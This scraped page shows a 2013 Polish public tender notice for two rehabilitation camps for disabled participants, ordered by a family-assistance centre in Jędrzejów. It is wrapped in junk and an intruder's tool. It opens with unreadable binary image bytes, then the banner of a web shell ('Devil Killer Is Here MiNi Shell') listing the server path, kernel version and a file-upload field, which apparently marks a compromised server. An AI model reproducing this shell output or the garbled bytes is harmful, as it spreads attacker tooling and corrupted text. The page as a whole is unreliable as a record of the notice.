JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130418/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130418/153938-N-2013.html

<p class="kh_header"><b>Jędrzejów: Organizacja 2 stacjonarnych turnusów rehabilitacyjno  usprawniających dla osób niepełnosprawnych w miejscowości położonej w górach w woj. małopolskim z organizacją  i przeprowadzeniem szkoleń z psychologiem-seksuologiem</b><br>
<b>Numer ogłoszenia: 153938 - 2013; data zamieszczenia: 18.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Okrzei 49b, 28-300 Jędrzejów, woj. świętokrzyskie, tel. 41 38 636 00, faks 41 38 636 00.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja 2 stacjonarnych turnusów rehabilitacyjno  usprawniających dla osób niepełnosprawnych w miejscowości położonej w górach w woj. małopolskim z organizacją  i przeprowadzeniem szkoleń z psychologiem-seksuologiem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie 2 stacjonarnych turnusów rehabilitacyjno  usprawniających dla osób niepełnosprawnych w miejscowości położonej w górach w woj. małopolskim z organizacją i przeprowadzeniem szkoleń z psychologiem seksuologiem
1. Turnus dla 18 osób niepełnosprawnych w wieku 19-41 lat wraz z towarzyszącymi im opiekunami w liczbie 7 osób, tj. łącznie 25 osób.
2. Turnus dla 6 niepełnoletnich osób niepełnosprawnych w wieku 15-18 lat wraz     z towarzyszącymi im opiekunami w liczbie 2 osób, tj. łącznie 8 osób. 
Stacjonarne turnusy usprawniająco-rekreacyjne przeznaczone są dla osób niepełnosprawnych (stopień niepełnosprawności: umiarkowany i znaczny): 
z dysfunkcją narządu ruchu, z wyłączeniem osób poruszających się na wózkach inwalidzkich, z dysfunkcją narządu wzroku, z dysfunkcją narządu słuchu, z upośledzeniem umysłowym, z chorobą psychiczną, z padaczką, ze schorzeniami układu krążenia, ze schorzeniami neurologicznymi, skierowanych na turnus przez lekarzy, pod opieką których się znajdują. 
Obydwa turnusy muszą odbywać się w jednym terminie tj.  od 26.05.2013r. do 08.06.2013r. 
Czas trwania turnusu: 14 dni pobytowych.
Zamówienie obejmuje transport uczestników i ich opiekunów z wyznaczonego miejsca w Jędrzejowie woj. świętokrzyskie, do miejsca odbycia turnusu i z miejsca odbycia turnusu po jego zakończeniu, do Jędrzejowa. 
Transport uczestników na turnusy rehabilitacyjne i z powrotem należy zabezpieczyć łącznie dla obydwu turnusów tj. dla grupy 33 osób. 
Miejsce odbywania turnusów: atrakcyjna turystycznie miejscowość górska w woj. małaopolskim - ośrodek wpisany do rejestru właściwego wojewody, zgodnie z przepisami rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007r. w sprawie turnusów rehabilitacyjnych (Dz.U. Nr 230, poz. 1694), przystosowany do realizacji turnusów rehabilitacyjnych dla osób niepełnosprawnych.
Wykonawca zagwarantuje pobyt w ośrodku w budynku, w którym będą zlokalizowane pomieszczenia sypialne, do rehabilitacji i szkolenia oraz sala do przeprowadzenia kursu. Dopuszcza się lokalizację gabinetów do rehabilitacji w innym budynku jeżeli odległość pomiędzy tymi budynkami nie przekroczy 150 m. 
Baza zabiegowa ośrodka winna obejmować minimum: inhalacje indywidualne, magnetoterapia, laseroterapia, krioterapia miejscowa, elektroterapia, terapia ultradźwiękowa, fototerapia, masaż.
Wykonawca w ramach zaoferowanej ceny zapewni uczestnikom: 
przewóz z wyznaczonego miejsca w Jędrzejowie woj. świętokrzyskie do miejsca odbywania turnusów oraz z miejsca turnusów rehabilitacyjnych po ich zakończeniu, do Jędrzejowa, autokarem z klimatyzacją o ilości miejsc odpowiedniej dla uczestników turnusu (tj. nie mniejszej niż 33), autokar musi być nie starszy niż 8 lat. 
zakwaterowanie w ośrodku w pokojach 2-4 osobowych z pełnym węzłem sanitarnym (wc, prysznic lub wanna, umywalka), telewizorem i czajnikiem elektrycznym.
całodzienne wyżywienie obejmujące co najmniej śniadanie, obiad i kolację oraz suchy prowiant w drodze powrotnej z turnusu. Suchy prowiant musi odpowiadać 75% wartości stawki dziennej wyżywienia na każdego uczestnika. 
pełną realizację opracowanych i złożonych u właściwego wojewody programów turnusów odpowiednich ze względu na ich rodzaj oraz rodzaje niepełnosprawności albo schorzenia lub dysfunkcje uczestników, 
zaplecze techniczne, użytkowe, socjalne umożliwiające realizację programów turnusów ( sale zabiegowe, urządzenia do ćwiczeń, urządzenia do rehabilitacji, sale do zajęć), 
baza zabiegowa ośrodka winna obejmować minimum: inhalacje indywidualne, magnetoterapia, laseroterapia, krioterapia miejscowa, elektroterapia, terapia ultradźwiękowa, fototerapia, masaż.
fachową kadrę gwarantującą prawidłową realizację programu turnusów wraz ze szkoleniem z psychologiem/seksuologiem, w skład której wchodzą w szczególności: kierownik odpowiedzialny za przebieg turnusu, pielęgniarka, specjalista do rehabilitacji ruchowej, pedagog lub inna osoba posiadająca przygotowanie pedagogiczne,  psycholog/seksuolog. 
stałą opiekę pielęgniarską i możliwość korzystania z opieki lekarskiej podczas turnusu, 
badanie lekarskie na początku i na końcu turnusu, 
co najmniej dwa zabiegi rehabilitacyjne dziennie (20 zabiegów w trakcie turnusu na osobę zarówno dla osoby niepełnosprawnej jak i opiekuna),
serwis kawowy na szkoleniach z psychologiem/seksuologiem tj. kawa, herbata, soki, woda mineralna i ciasteczka.
przygotowanie i realizację programu kulturalno-oświatowego zawierającego co najmniej dla:
1. turnusu dla 18 osób niepełnosprawnych w wieku 19-41 lat wraz z towarzyszącymi im opiekunami w liczbie 7 osób, tj. łącznie 25 osób
wycieczka: zwiedzanie Zakopanego i okolic m. in. Sanktuarium NMP na Krzeptówkach, Skoczni, Starego Cmentarza-Pęksów Brzyzek, wyjazd kolejką na Gubałówkę (góra-dół), wieczorek zapoznawczy, ognisko z kiełbaskami  + kapela, wyjazd na Słowację do Tatralandii (wyjazd całodniowy -prowiant + ciepły posiłek na basenie), wycieczka w Tatry Słowackie- Jaskinia Bielańska, Szczyrbskie Jezioro, przejazd kolejką panoramiczną elektryczną do Starego Smokowca -wyjazd kolejką linowo-terenową na Hrebienok (obiad w trakcie wycieczki), Wycieczka na Rusinową Polanę transport, przewodnik po stronie Ośrodka, spotkanie z astronomem, zajęcia z teleskopem, całodniowa Wycieczka do Krakowa i Wieliczki: Kraków-Wzgórze Wawelskie, Dzwon Zygmunta, Groby Królewskie, przejście Drogą Królewską na Rynek Główny, Kościół Mariacki, Wieliczka-Kopalnia Soli -obiad w podziemiach,
wyjazd na Kasprowy Wierch, wycieczka do Doliny Białego ( po drodze Muzeum Tatrzańskie z eksponatami tatrzańskiej flory i fauny), wycieczka do zamku w Niedzicy - rejs statkiem po jeziorze Czorsztyńskim, wieczór regionalny w Karczmie, zabawa taneczna, wieczór filmowy
2. turnus dla 6 niepełnoletnich osób niepełnosprawnych w wieku 15-18 lat wraz z towarzyszącymi im opiekunami w liczbie 2 osób, tj. łącznie 8 osób:  wycieczka: zwiedzanie Zakopanego i okolic m. in. Sanktuarium NMP na Krzeptówkach, Skoczni, Starego Cmentarza-Pęksów Brzyzek, wyjazd kolejką na Gubałówkę (góra-dół), wieczorek zapoznawczy, ognisko z kiełbaskami  + kapela, Wycieczka na Rusinową Polanę -transport, przewodnik po stronie Ośrodka, spotkanie z astronomem, zajęcia z teleskopem, całodniowa Wycieczka do Krakowa i Wieliczki: Kraków-Wzgórze Wawelskie, Dzwon Zygmunta, Groby Królewskie, przejście Drogą Królewską na Rynek Główny, Kościół Mariacki, Wieliczka-Kopalnia Soli - obiad w podziemiach, wyjazd na Kasprowy Wierch, wycieczka do Doliny Białego ( po drodze Muzeum Tatrzańskie z eksponatami tatrzańskiej flory i fauny), wycieczka do zamku w Niedzicy - rejs statkiem po jeziorze Czorsztyńskim, wieczór regionalny w Karczmie, zabawa taneczna, wieczór filmowy
Wszystkie koszty związane z przygotowaniem i realizacją powyższych programów kulturalno-oświatowych (np. autokar, przewodnik, bilety wstępu i inne) po stronie Wykonawcy, jak również:
 ubezpieczenie od następstw nieszczęśliwych wypadków w czasie trwania turnusów a także w czasie transportu uczestników, 
pokrycie kosztów opłaty klimatycznej.
 W ramach pobytu na turnusach należy przeprowadzić: 
Turnus nr 1 (dla 18 osób niepełnosprawnych)
Szkolenie  z psychologiem-seksuologiem;
Warsztaty w 2 grupach (po 9 osób) - po 4 godziny lekcyjne na 1 grupę łącznie 8 godzin lekcyjnych 
Prowadzący: psycholog-seksuolog 

Turnus nr 2 (dla 6 osób niepełnosprawnych)
Szkolenie  z psychologiem-seksuologiem;
Warsztaty w grupie 6 osób -  4 godziny lekcyjne na grupę  
Prowadzący: psycholog-seksuolog 
Wykonawca zapewnia również dla tej grupy (6 osób) salę do przeprowadzenia kursu papieroplastyki na 5 godzin dziennie przez 6 dni (łącznie 30 godzin)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.14.00.00-2, 85.31.25.00-4, 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie należy złożyć: 
posiadane uprawnienie do organizowania turnusów rehabilitacyjnych potwierdzone wpisem do rejestru prowadzonego przez właściwego wojewodę z terminem ważności wpisu co najmniej do dnia zakończenia turnusu,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie należy złożyć:
wykaz wykonanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie. 
Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że  wykonał minimum cztery usługi związane z organizacją turnusów rehabilitacyjny w tym minimum dwie gdzie w każdej uczestniczyło minimum 20 osób (z opiekunami) zakres obejmował transport tych osób na miejsce turnusu i z powrotem i wartość każdej z dwóch wymaganych usług wynosiła minimum 40 tys. PLN
Do pozycji wykazu odnoszących się do dwóch usług opisanych z wymaganą wartością i ilością osób, należy załączyć dowody określające, czy usługi te zostały wykonane w sposób należyty</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie należy złożyć:
wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych  dostępnych Wykonawcy usługi w celu realizacji  zamówienia wraz z informacją o podstawie dysponowania tymi zasobami; wykaz musi zawierać informacje;
dysponowanie ośrodkiem, w którym mogą odbywać się turnusy rehabilitacyjne, wpisanym do rejestru właściwego wojewody z terminem ważności wpisu co najmniej do dnia 30 czerwca 2013r., tj. prowadzenie własnego ośrodka lub uzyskanie zapewnienia ze strony uprawnionego podmiotu prowadzącego taki ośrodek o gotowości udostępnienia go wykonawcy w celu odbycia turnusu rehabilitacyjnego, w terminie wskazanym przez niego w ofercie;
ośrodek musi spełniać warunki dostępności wymagane dla osób niepełnosprawnych uczestniczących w turnusie, określone w § 15 ust. 1 pkt 4 lit. a) i e) rozporządzenia (Dz.U.2007.230.1694), oraz posiadać bazę żywieniową (stołówka) i noclegową ( pokoje  2, 3 i 4-osobowe. Wszystkie pokoje z pełnym węzłem sanitarnym (w.c., prysznic lub wanna, umywalka,) telewizorem; zaplecze techniczne i lokalowe do realizacji programów turnusów oraz aktywnych form rehabilitacji (sale zabiegowe, urządzenia do ćwiczeń, urządzenia do rehabilitacji, sale do zajęć zlokalizowane w budynku zakwaterowania uczestników), dysponować zapleczem do realizacji zajęć kulturalno-oświatowych, dysponować zapleczem rekreacyjno - wypoczynkowym, 
Opis ośrodka, w którym mają odbyć się turnusy rehabilitacyjne pod kątem jego wyposażenia i zaplecza technicznego do rehabilitacji osób niepełnosprawnych oraz spełnienia warunków, o których mowa w pkt 7.2.3.1, wraz z pisemnym zapewnieniem podmiotu prowadzącego ośrodek o gotowości udostępnienia go  Wykonawcy w celu odbycia turnusów rehabilitacyjnych, w terminie wskazanym przez Zamawiającego lub umowę przedwstępną z takim podmiotem - jeżeli Wykonawca nie prowadzi własnego ośrodka
dysponowanie autokarami przystosowanymi do przewozu osób niepełnosprawnych, z WC i klimatyzacją, minimalna ilość  33 miejsc siedzących, należy wskazać prawo do jego dysponowania oraz określić markę i model autokaru, nie starszy niż 8 lat
dysponowanie salą wykładową do przeprowadzenia szkoleń z psychologiem-seksuologiem
dysponowanie salą wykładową do przeprowadzenia kursu papieroplastyki,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie należy złożyć:
wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie, wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia oraz informacji o podstawie do dysponowania tymi osobami - Potwierdzeniem spełniania warunku będzie przedstawienie wykazu zawierającego nie mniej niż; kierownik odpowiedzialny za przebieg turnusu osoba posiadająca wykształcenie wyższe z zakresu pedagogiki i zarządzania w pomocy społecznej lub psychologii,  min 3 letnie doświadczenie w organizacji turnusów wypoczynkowych z doświadczeniem w pracy z osobami niepełnosprawnymi;
pielęgniarka Osoba posiadająca wykształcenie medyczne i prawo wykonywania zawodu pielęgniarki oraz min 3 letnie doświadczenie w pracy z osobami niepełnosprawnymi;
psycholog osoba posiadająca wykształcenie wyższe psychologiczne i uprawnienia pedagogiczne, min 3 letnie doświadczenie w pracy z osobami niepełnosprawnymi;
specjalista do spraw rehabilitacji ruchowej osoba posiadająca wykształcenie wyższe, kwalifikacje fizjoterapeuty  i min 3 letnie doświadczenie w pracy z osobami niepełnosprawnymi;
pedagog lub inna osoba posiadająca przygotowanie pedagogiczne Osoba posiadająca wykształcenie wyższe pedagogiczne, min. 3 lata doświadczenia w pracy z osobami niepełnosprawnymi, posiadająca doświadczenie w organizacji turnusów rehabilitacyjnych oraz zajęć sportowo- rekreacyjnych dla osób niepełnosprawnych;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie należy złożyć ;
oświadczenie Wykonawcy z art. 22 ust. 1 ustawy o spełnieniu warunków podmiotowych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę zawartej umowy w następujących okolicznościach;
Zmiana postanowień umowy na skutek zmian technicznych i organizacyjnych, spowodowanych następującymi okolicznościami;
1) Zmiana wykazanych środków transportu, zmienione pojazdy mają posiadać parametry tożsame lub lepsze od przyjętych w ofercie. Zamiana następuje za zgodą Zamawiającego i jest możliwa tylko w okolicznościach powstałych, na które niemiał wpływu Wykonawca.
2) Zamiana wskazanego w ofercie kadry tylko na kadrę o kwalifikacjach i doświadczeniu tożsamym lub lepszym. Zamiana następuje za zgodą Zamawiającego i jest możliwa tylko w okolicznościach powstałych, na które niemiał wpływu Wykonawca.
3) Zmiana miejsca organizacji turnusu wskazanego w ofercie tylko w przypadku niemożności zrealizowania turnusu z przyczyn niezależnych od Wykonawcy w okolicznościach których nie dało się przewidzieć i były to okoliczności nie zawinione przez Wykonawcę na inne miejsce o standardzie i wymaganiach określonych w SIWZ. 
4) Zmniejszenie ilości osób i związane z tym zmniejszenie wynagrodzenia odpowiadającego faktycznej ilości osób uczestniczących w turnusie na  zasadach opisanych w SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatjedrzejow.pl ścieżka dostępu: Jednostki organizacyjne-PCPR-zamówienia publ.-usługi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Jędrzejowie
 ul. Okrzei 49B,
28-300 Jędrzejów
sekretariat dyrektora.</p>
